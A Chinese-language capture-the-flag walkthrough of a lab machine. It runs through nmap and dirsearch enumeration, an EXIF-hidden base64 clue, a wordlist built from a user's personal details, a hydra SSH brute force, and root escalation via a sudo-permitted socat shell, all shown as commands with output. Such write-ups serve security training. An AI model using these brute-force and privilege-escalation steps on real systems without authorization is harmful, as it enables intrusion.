靶机测试
- arp-scan
- port
- url枚举
- exiftool
- 套中套
- password
- sudo 提权
`
arp-scan
arp-scan 检测局域网中活动的主机
192.168.9.203 靶机IP地址
port
通过nmap扫描,获取目标主机的端口信息
┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.203
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
url枚举
dirsearch目录扫描,默认的字典,扫不出来
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r
[07:22:28] 301 - 312B - /img -> http://192.168.9.203/img/
[07:22:33] 301 - 312B - /css -> http://192.168.9.203/css/
[07:22:36] 301 - 311B - /js -> http://192.168.9.203/js/
[07:38:24] 301 - 319B - /staffpages -> http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 - 278B - /server-status
[############ ] 60% 134151/220545 119/s job:1/1 errors:82
[5]+ 已停止 dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Get a picture,必定有鬼
wget http://192.168.9.203/staffpages/new_employees.jpg
exiftool
┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg
ExifTool Version Number : 12.49
File Name : new_employees.jpeg
Directory : .
File Size : 160 kB
File Modification Date/Time : 2023:11:27 12:11:43-05:00
File Access Date/Time : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time : 2024:05:10 05:53:33-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width : 703
Image Height : 1136
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 703x1136
Megapixels : 0.799
套中套
┌──(root㉿kali)-[~]
└─# echo 'ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן
CTF打多了,一眼就看出是倒着的字母 message_for_michael
访问 /staffpages/message_for_michael
Hi Michael
Sorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.
By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file
personal_info.txt
访问/staffpages/personal_info.txt
name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimming
password
通过个人信息生成密码字典
leahcim
michael
19961019
19101996
michael1996
leahcim1996
...
hydra爆破ssh
┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203
[22][ssh] host: 192.168.9.203 login: michael password: leahcim1996
sudo 提权
在/home目录下发现用户
michael@animetronic:/home$ cd henry/
michael@animetronic:/home/henry$ ls
Note.txt user.txt
michael@animetronic:/home/henry$ cat user.txt
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ cat Note.txt
if you need my account to do anything on the server,
you will find my password in file named
aGVucnlwYXNzd29yZC50eHQK
michael@animetronic:/home/henry$ echo 'aGVucnlwYXNzd29yZC50eHQK' | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam
是henry的密码
michael@animetronic:/home/henry$ su henry
Password:
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User henry may run the following commands on animetronic:
(root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a